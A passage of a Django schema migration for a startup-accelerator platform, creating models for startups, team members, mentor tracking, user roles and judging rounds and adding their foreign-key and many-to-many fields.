('startup_profiles', models.BooleanField(default=False)),
('startup_team_members', models.BooleanField(default=False)),
('mentor_list', models.BooleanField(default=False)),
('videos', models.BooleanField(default=False)),
('sponsor_list', models.BooleanField(default=False)),
('sponsor_profiles', models.BooleanField(default=False)),
('sponsor_logos', models.BooleanField(default=False)),
('jobs', models.BooleanField(default=False)),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_SITE_MODEL)),
],
options={
'verbose_name_plural': 'Site Program Authorizations',
'db_table': 'accelerator_siteprogramauthorization',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SITEPROGRAMAUTHORIZATION_MODEL',
},
),
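        # SiteRedirectPage is a fluent-pages page type: bases=('fluent_pages.page',)
        # gives multi-table inheritance from fluent_pages.Page, hence the
        # urlnode_ptr parent link and the 'pagetype_' db_table prefix.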
migrations.CreateModel(
name='SiteRedirectPage',
fields=[
('urlnode_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='fluent_pages.UrlNode')),
('new_url', models.CharField(max_length=100)),
],
options={
'verbose_name': 'Site Redirect',
'verbose_name_plural': 'Site Redirects',
'db_table': 'pagetype_accelerator_siteredirectpage',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SITEREDIRECTPAGE_MODEL',
'manager_inheritance_from_future': True,
},
bases=('fluent_pages.page',),
),
migrations.CreateModel(
name='Startup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
                ('is_visible', models.BooleanField(default=True, help_text='Startup Profiles will be published to external websites through the API.')),
('short_pitch', models.CharField(help_text='Your startup in 140 characters or less.', max_length=140)),
('full_elevator_pitch', models.TextField(help_text='Your startup in 500 characters or less.', max_length=500)),
('linked_in_url', models.URLField(blank=True, max_length=100, verbose_name='LinkedIn profile URL')),
('facebook_url', models.URLField(blank=True, max_length=100, verbose_name='Facebook profile URL')),
('high_resolution_logo', sorl.thumbnail.fields.ImageField(blank=True, upload_to='startup_pics', verbose_name='High Resolution Logo')),
('video_elevator_pitch_url', embed_video.fields.EmbedVideoField(blank=True, help_text='Upload your 1-3 minute video pitch to Vimeo or Youtube. Paste the shared link here.', max_length=100)),
                ('acknowledgement', models.BooleanField(default=False, help_text='I understand that my Startup Profile is a prerequisite for applying to any MassChallenge Program')),
('created_datetime', models.DateTimeField(blank=True, null=True)),
('last_updated_datetime', models.DateTimeField(blank=True, null=True)),
('community', models.CharField(blank=True, choices=[('red', 'Red'), ('blue', 'Blue'), ('green', 'Green')], max_length=64)),
                ('profile_background_color', models.CharField(blank=True, default='217181', max_length=7, validators=[django.core.validators.RegexValidator('^([0-9a-fA-F]{3}|[0-9a-fA-F]{6}|)$', 'Color must be a 3- or 6-digit hexadecimal number, such as FF0000 for red.')])),
                ('profile_text_color', models.CharField(blank=True, default='FFFFFF', max_length=7, validators=[django.core.validators.RegexValidator('^([0-9a-fA-F]{3}|[0-9a-fA-F]{6}|)$', 'Color must be a 3- or 6-digit hexadecimal number, such as FF0000 for red.')])),
('location_national', models.CharField(blank=True, default='', help_text='Please specify the country where your main office (headquarters) is located', max_length=100)),
('location_regional', models.CharField(blank=True, default='', help_text='Please specify the state, region or province where your main office (headquarters) is located (if applicable).', max_length=100)),
('location_city', models.CharField(blank=True, default='', help_text='Please specify the city where your main office (headquarters) is located. (e.g. Boston)', max_length=100)),
('location_postcode', models.CharField(blank=True, default='', help_text='Please specify the postal code for your main office (headquarters). (ZIP code, Postcode, codigo postal, etc.)', max_length=100)),
('date_founded', models.CharField(blank=True, help_text='Month and Year when your startup was founded.', max_length=100)),
('landing_page', models.CharField(blank=True, max_length=255, null=True)),
('additional_industries', models.ManyToManyField(blank=True, db_table='accelerator_startup_related_industry', help_text='You may select up to 5 related industries.', related_name='secondary_startups', to=settings.MPTT_SWAPPABLE_INDUSTRY_MODEL, verbose_name='Additional Industries')),
('currency', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_CURRENCY_MODEL)),
('organization', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='startups', to=settings.ACCELERATOR_ORGANIZATION_MODEL)),
('primary_industry', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='startups', to=settings.MPTT_SWAPPABLE_INDUSTRY_MODEL, verbose_name='Primary Industry categorization')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Startups',
'db_table': 'accelerator_startup',
'ordering': ['organization__name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUP_MODEL',
},
),
migrations.CreateModel(
name='StartupAttribute',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('attribute_value', models.TextField(help_text='Stored text representation of the value', verbose_name='Value')),
('attribute', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMSTARTUPATTRIBUTE_MODEL)),
('startup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL)),
],
options={
'verbose_name_plural': 'Startup Attributes',
'db_table': 'accelerator_startupattribute',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPATTRIBUTE_MODEL',
},
),
migrations.CreateModel(
name='StartupCycleInterest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('cycle', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL)),
],
options={
'db_table': 'accelerator_startupcycleinterest',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPCYCLEINTEREST_MODEL',
},
),
migrations.CreateModel(
name='StartupLabel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('label', models.CharField(max_length=255)),
('startups', models.ManyToManyField(blank=True, to=settings.ACCELERATOR_STARTUP_MODEL)),
],
options={
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPLABEL_MODEL',
},
),
migrations.CreateModel(
name='StartupMentorRelationship',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('status', models.CharField(choices=[('Confirmed', 'Confirmed'), ('In Discussions With', 'In Discussions With'), ('Desired', 'Desired')], default='Desired', max_length=32)),
('primary', models.BooleanField(default=False)),
('mentor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Startup Mentor Relationships',
'db_table': 'accelerator_startupmentorrelationship',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPMENTORRELATIONSHIP_MODEL',
},
),
migrations.CreateModel(
name='StartupMentorTrackingRecord',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('other_mentors', models.TextField(blank=True, help_text='Add any mentors you meet with who are not listed in the MassChallenge Mentor Directory. Please provide their name, company, and email address below.', null=True, verbose_name='Additional Mentors')),
('notes', models.TextField(blank=True, help_text='Submit the three goals you plan to work on with your mentors during the accelerator program.', null=True, verbose_name='Program Goals')),
('mentors', models.ManyToManyField(help_text="Select the Mentors you would like to work with during the program. Start typing a Mentor's name; if they are in the Mentor Directory, their name should appear as you type. If you don't find the person you are looking for, use 'Other Mentors' below.", through='accelerator.StartupMentorRelationship', to=settings.AUTH_USER_MODEL, verbose_name='Registered Mentors')),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
('startup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL)),
],
options={
'verbose_name': 'Mentor Tracking Record',
'verbose_name_plural': 'Mentor Tracking Records',
'db_table': 'accelerator_startupmentortrackingrecord',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPMENTORTRACKINGRECORD_MODEL',
},
),
migrations.CreateModel(
name='StartupOverrideGrant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('program_override', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMOVERRIDE_MODEL)),
('startup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL)),
],
options={
'verbose_name_plural': 'Startup Override Grants',
'db_table': 'accelerator_startupoverridegrant',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPOVERRIDEGRANT_MODEL',
},
),
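        # StartupProgramInterest's non-editable, indexed 'order' field plus
        # Meta.ordering ['order'] is the signature of an explicitly managed
        # ordering (the pattern used by libraries such as django-ordered-model).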
migrations.CreateModel(
name='StartupProgramInterest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('order', models.PositiveIntegerField(db_index=True, editable=False)),
('applying', models.BooleanField(default=False)),
('interest_level', models.CharField(blank=True, choices=[('g', 'Definitely will participate'), ('w', 'Will participate'), ('p', 'Likely will participate'), ('n', 'Might not participate'), ('l', "Likely won't participate")], max_length=64, null=True)),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
('startup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL)),
('startup_cycle_interest', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUPCYCLEINTEREST_MODEL)),
],
options={
'db_table': 'accelerator_startupprograminterest',
'ordering': ['order'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPPROGRAMINTEREST_MODEL',
},
),
migrations.CreateModel(
name='StartupRole',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255)),
],
options={
'db_table': 'accelerator_startuprole',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPROLE_MODEL',
},
),
migrations.CreateModel(
name='StartupStatus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('program_startup_status', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMSTARTUPSTATUS_MODEL)),
('startup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL)),
],
options={
'verbose_name_plural': 'Startup Statuses',
'db_table': 'accelerator_startupstatus',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPSTATUS_MODEL',
},
),
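        # StartupTeamMember.founder uses NullBooleanField, which was deprecated
        # in Django 3.1 in favor of BooleanField(null=True); it is kept as-is
        # here to preserve the historical migration state.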
migrations.CreateModel(
name='StartupTeamMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('title', models.CharField(blank=True, max_length=60)),
('startup_administrator', models.BooleanField(help_text='You have to have at least one administrator')),
('is_contact', models.BooleanField(default=False, help_text='A secondary contact for the startup')),
('primary_contact', models.BooleanField(default=False, help_text='You may only have one primary contact')),
('technical_contact', models.BooleanField(default=False)),
('marketing_contact', models.BooleanField(default=False)),
('financial_contact', models.BooleanField(default=False)),
('legal_contact', models.BooleanField(default=False)),
('product_contact', models.BooleanField(default=False)),
('design_contact', models.BooleanField(default=False)),
('display_on_public_profile', models.BooleanField(default=True)),
('founder', models.NullBooleanField(default=False)),
('startup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Startup Team Members',
'db_table': 'accelerator_startupteammember',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPTEAMMEMBER_MODEL',
},
),
migrations.CreateModel(
name='UserLabel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('label', models.CharField(max_length=255)),
('users', models.ManyToManyField(blank=True, to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'accelerator_userlabel',
'ordering': ['label'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_USERLABEL_MODEL',
},
),
migrations.CreateModel(
name='UserLegalCheck',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('accepted', models.BooleanField(default=False)),
('legal_check', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_set', to=settings.ACCELERATOR_LEGALCHECK_MODEL)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='legalcheck_set', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'User Legal Check',
'db_table': 'accelerator_userlegalcheck',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_USERLEGALCHECK_MODEL',
},
),
migrations.CreateModel(
name='UserRole',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255)),
('url_slug', models.CharField(max_length=30)),
('sort_order', models.PositiveIntegerField()),
],
options={
'db_table': 'accelerator_userrole',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_USERROLE_MODEL',
},
),
migrations.CreateModel(
name='UserRoleMenu',
fields=[
('urlnode_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='fluent_pages.UrlNode')),
('program_status', models.CharField(blank=True, choices=[('upcoming', 'Upcoming'), ('active', 'Active'), ('ended', 'Ended'), ('hidden', 'Hidden')], max_length=64, null=True)),
('program', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL, verbose_name='Program')),
('program_family', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL, verbose_name='Program Family')),
('user_role', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_USERROLE_MODEL, verbose_name='User Role')),
],
options={
'verbose_name': 'User Role Menu',
'verbose_name_plural': 'User Role Menus',
'db_table': 'pagetype_accelerator_userrolemenu',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_USERROLEMENU_MODEL',
'manager_inheritance_from_future': True,
},
bases=('fluent_pages.page',),
),
migrations.CreateModel(
name='Allocator',
fields=[
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('judging_round', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to=settings.ACCELERATOR_JUDGINGROUND_MODEL)),
],
options={
'verbose_name_plural': 'Allocators',
'db_table': 'accelerator_allocator',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_ALLOCATOR_MODEL',
},
),
migrations.AddField(
model_name='startupmentorrelationship',
name='startup_mentor_tracking',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUPMENTORTRACKINGRECORD_MODEL),
),
migrations.AddField(
model_name='startupcycleinterest',
name='interested_programs',
field=models.ManyToManyField(through='accelerator.StartupProgramInterest', to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='startupcycleinterest',
name='startup',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL),
),
migrations.AddField(
model_name='scenario',
name='applications',
field=models.ManyToManyField(related_name='scenarios', through='accelerator.ScenarioApplication', to=settings.ACCELERATOR_APPLICATION_MODEL),
),
migrations.AddField(
model_name='scenario',
name='judges',
field=models.ManyToManyField(related_name='scenarios', through='accelerator.ScenarioJudge', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='scenario',
name='judging_round',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='refundcoderedemption',
name='startup',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL),
),
migrations.AddField(
model_name='programstartupstatus',
name='startup_role',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUPROLE_MODEL),
),
migrations.AddField(
model_name='programrole',
name='user_label',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='dont_use_commit_fail', to=settings.ACCELERATOR_USERLABEL_MODEL),
),
migrations.AddField(
model_name='programrole',
name='user_role',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_USERROLE_MODEL),
),
migrations.AddField(
model_name='programpartner',
name='partner_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMPARTNERTYPE_MODEL),
),
migrations.AddField(
model_name='programpartner',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='program',
name='cycle',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='programs', to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL),
),
migrations.AddField(
model_name='program',
name='mentor_program_group',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_NAMEDGROUP_MODEL),
),
migrations.AddField(
model_name='program',
name='program_family',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='programs', to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='paypalpayment',
name='cycle',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL),
),
migrations.AddField(
model_name='paypalpayment',
name='startup',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL),
),
migrations.AddField(
model_name='paneltype',
name='judging_round',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='paneltime',
name='judging_round',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='panellocation',
name='judging_round',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='panel',
name='location',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANELLOCATION_MODEL),
),
migrations.AddField(
model_name='panel',
name='panel_time',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANELTIME_MODEL),
),
migrations.AddField(
model_name='panel',
name='panel_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANELTYPE_MODEL),
),
migrations.AddField(
model_name='observer',
name='newsletter_cc_roles',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_PROGRAMROLE_MODEL),
),
migrations.AddField(
model_name='nodesubnavassociation',
name='node',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fluent_pages.UrlNode'),
),
migrations.AddField(
model_name='nodesubnavassociation',
name='sub_nav',
field=models.ForeignKey(help_text='This is the sub navigation tree that this page is tied to', on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_NAVTREE_MODEL),
),
migrations.AddField(
model_name='nodesubnavassociation',
name='sub_nav_item',
field=models.ForeignKey(help_text='This is the sub navigation item that this page is tied to', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_NAVTREEITEM_MODEL),
),
migrations.AddField(
model_name='nodepublishedfor',
name='node',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fluent_pages.UrlNode'),
),
migrations.AddField(
model_name='nodepublishedfor',
name='published_for',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMROLE_MODEL),
),
migrations.AddField(
model_name='newsletter',
name='judging_round',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='newsletter',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='newsletter',
name='recipient_roles',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_PROGRAMROLE_MODEL),
),
migrations.AddField(
model_name='navtreeitem',
name='program',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='navtreeitem',
name='program_family',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='navtreeitem',
name='tree',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_NAVTREE_MODEL),
),
migrations.AddField(
model_name='navtreeitem',
name='user_role',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_USERROLE_MODEL),
),
migrations.AddField(
model_name='mentorprogramofficehour',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='memberprofile',
name='current_program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='memberprofile',
name='interest_categories',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_INTERESTCATEGORY_MODEL),
),
migrations.AddField(
model_name='memberprofile',
name='program_families',
field=models.ManyToManyField(blank=True, help_text='Which of our Program Families would you like to be involved with?', related_name='interested_memberprofile', to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='memberprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='judginground',
name='application_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATIONTYPE_MODEL),
),
migrations.AddField(
model_name='judginground',
name='confirmed_judge_label',
field=models.ForeignKey(blank=True, help_text='Label for Confirmed Judges', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='rounds_confirmed_for', to=settings.ACCELERATOR_USERLABEL_MODEL),
),
migrations.AddField(
model_name='judginground',
name='desired_judge_label',
field=models.ForeignKey(blank=True, help_text='Label for Desired Judges', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='rounds_desired_for', to=settings.ACCELERATOR_USERLABEL_MODEL),
),
migrations.AddField(
model_name='judginground',
name='feedback_merge_with',
field=models.ForeignKey(blank=True, help_text='Optional: merge the display of this feedback with another round', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='judginground',
name='judging_form',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGFORM_MODEL),
),
migrations.AddField(
model_name='judginground',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='judginground',
name='startup_label',
field=models.ForeignKey(blank=True, help_text='Label for Startups', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUPLABEL_MODEL),
),
migrations.AddField(
model_name='judgeroundcommitment',
name='judging_round',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='judgepanelassignment',
name='panel',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANEL_MODEL),
),
migrations.AddField(
model_name='judgepanelassignment',
name='scenario',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='judge_assignments', to=settings.ACCELERATOR_SCENARIO_MODEL),
),
migrations.AddField(
model_name='judgefeedbackcomponent',
name='feedback_element',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGFORMELEMENT_MODEL),
),
migrations.AddField(
model_name='judgefeedbackcomponent',
name='judge_feedback',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGEAPPLICATIONFEEDBACK_MODEL),
),
migrations.AddField(
model_name='judgeavailability',
name='commitment',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGEROUNDCOMMITMENT_MODEL),
),
migrations.AddField(
model_name='judgeavailability',
name='panel_location',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANELLOCATION_MODEL),
),
migrations.AddField(
model_name='judgeavailability',
name='panel_time',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANELTIME_MODEL),
),
migrations.AddField(
model_name='judgeavailability',
name='panel_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANELTYPE_MODEL),
),
migrations.AddField(
model_name='judgeapplicationfeedback',
name='form_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGFORM_MODEL),
),
migrations.AddField(
model_name='judgeapplicationfeedback',
name='judge',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='judgeapplicationfeedback',
name='panel',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANEL_MODEL),
),
migrations.AddField(
model_name='judgeapplicationfeedback',
name='viewers',
field=models.ManyToManyField(db_table='accelerator_judgeapplicationfeedback_viewers', related_name='viewed_feedback', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='jobposting',
name='startup',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL),
),
migrations.AddField(
model_name='interestcategory',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='expertprofile',
name='additional_industries',
field=models.ManyToManyField(db_table='accelerator_expert_related_industry', help_text='You may select up to 5 related industries. To select multiple industries, please press and hold Control (CTRL) on PCs or Command (⌘) on Macs.', related_name='secondary_experts', to=settings.MPTT_SWAPPABLE_INDUSTRY_MODEL, verbose_name='Additional Industries'),
),
migrations.AddField(
model_name='expertprofile',
name='current_program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='expertprofile',
name='expert_category',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='experts', to=settings.ACCELERATOR_EXPERTCATEGORY_MODEL, verbose_name='I primarily consider myself a'),
),
migrations.AddField(
